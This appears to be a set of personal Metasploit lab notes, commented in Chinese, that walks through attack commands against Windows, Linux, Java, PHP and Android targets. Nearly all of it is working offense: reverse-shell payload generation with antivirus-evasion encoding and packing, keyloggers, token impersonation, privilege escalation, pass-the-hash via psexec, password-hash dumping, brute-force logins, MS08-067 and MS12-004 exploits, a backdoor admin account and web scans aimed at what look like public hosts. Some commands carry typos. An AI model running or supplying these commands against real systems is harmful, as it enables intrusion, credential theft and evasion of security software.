>use exploit/multi/handler
>set payload windows/meterpreter/reverse_tcp
>show options
>set LHOST 192.168.48.133
>set LPORT 1111
>run
//在靶机上运行生成的后门
>run metsvc -A
>use exploit/multi/handler
>set payload windows/metsvc_bind_tcp
>set LPORT 31337
>set RHOST 192.168.48.130
>exploit
>getuid
//需要有服务器的程序才能运行 win2003
>net user
//用键盘记录密码的后门比较安全
>keyscan_start
>keyscan_dump
//上传shift后门,覆盖原来热键
>shell
>search keylogger
>use auxiliary/server/capture/http_javascript_keylogger
>show options
>set DEMO true
>set URIPATH /
>set srvport 80
>run
//生成了url
#msfpayload windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R | msfencode -e x86/shikata_ga_nai -t exe>123.exe
//世界杀毒网监测一下生成的病毒 www.virus.org
#msfencode -l
//查看不同的编码
#msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R |msfencode -e x86/shikata_ga_nai -c 10 -t raw | msfencode -e x86/countdown -c 5 -t exe -o /1231.exe
#msfencode windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R | msfencode -t exe -x /root/ftp.exe -o 123123.exe -e x86/shikata_ga_nai -k -c 10
#upx -5 /1231.exe
//加壳
>run get_local_subnets
>run autoroute -s 192.168.48.0/24
>run autoroute -p
>use incognito
>list_tokens -u
>impersonate_token ADMIN-66DDA0F56\wing
>shell
没有域环境
>sessions
>use auxiliary/sniffer/psnufile
//嗅探ftp密码
>show payloads
#msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.48.130 LPORT=1234 X >/123.exe
123.exe 放到windows主机上
msf>search handler
msf>use exploit/multi/handler
msf>show options
msf>set playload windows/meterpreter/reverse_tcp
msf>show options
msf>set LHOST 192.168.48.130
msf>set LPORT 1234
msf>exploit
#msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.48.130 LPORT=4321 X>linux
#chmod 777 linux
#./linux
#msfpayload java/meterpreter/reverse_tvp LHOST=192.168.48.130 LPORT=1111 W>123.jar
#msfpayload php/meterpreter/reverse_tcp LHOST=192.168.48.130 LPORT=2222 R | msfencode -e php/base64 -t raw -o 123.php
#msfpayload android/meterpreter/reverse_tcp LHOST=192.168.48.130 LPORT=3333 R >1.apk
sessions
//建立一个回话
search 14-002
use exploit/windows/local/ms_ndproxy
sessions
show options
set session 1
exploit
getuid
getsystem
use exploit/windows/smb/psexec
set RHOST 192.168.48.129
set SMBUSER wing
exploit
hashdump
exit
set smbpass <哈希值>
//直接用哈希值登陆
exploit
启动mysql
开启SSH
search mysql_login
use auxiliary/scanner/mysql/mysql_login
show options
set RHOSTS 127.0.0.1
set USERNAME root
set PASS_FILE /root/1.txt
set THREADS 50
show options
exploit
msql -u root -p
search ssh_login
use auxiliary/scanner/ssh/ssh_login
show options
set RHOSTS 127.0.0.1
set USERNAME root
set PASS_FILE /root/1.txt
set THREADS 50
exploit
search ftp_login
search 12-004
use exploit/windows/browser/ms12_004_midi
show options
set SRVHOST 192.168.48.130
exploit
set URIPATH /
show options
exploit
set LPORT 1234
show options
exploit
sessions -i 1
shell
ipconfig
search 08-067
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.48.129
show options
show payload
set payload winows/meterpreter/reverse_tcp
set LHOST 192.168.48.130
show options
info
nmap -o 192.168.48.129
show target
set target 17
show options
exploit
shell
whoami
net user admin admin /add
net user admin /del
检测一些轻量级的web漏洞的插件
load wmap
wmap_sites
wmap_sites -a http://www.0day.co
wmap_sites -l
wmap_targets -t http://210.209.122.31
wmap_run -h
wmap_run -t
wmap_run -e
load wmap
wmap_vulns -l
vulns
use auxiliary/scanner/vnc/vnc_auth
show options
set RHOSTS 192.168.126.0/24
set THREARDS 50
run
use auxiliary/scanner/smb/smb_login
show options
set RHOSTS 192.168.126.0/24
set SMBUser administrator
set THREARDS 10
run
search snmp
use auxiliary/scanner/snmp/snmp_login
show options
set RHOSTS 192.168.126.131
set THREADS 10
run
use auxiliary/scanner/snmp/snmp_enum
show options
set THREADS 10
use auxiliary/sniffer/psnuffle
直接 run
use auxiliary/scanner/ssh/ssh_version
use auxiliary/scanner/ftp/ftp_version
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.126.1-200
run
nmap -v -sV 192.168.1.1
search portscan
use auxiliary/scanner/portscan/syn
show option
run
use auxiliary/scanner/portscan/tcp
wmap 启用命令: load wmap,来扫描web漏洞
smb登陆检查是 看对方的IP地址和账号密码登陆验证 自动检测445端口的
use
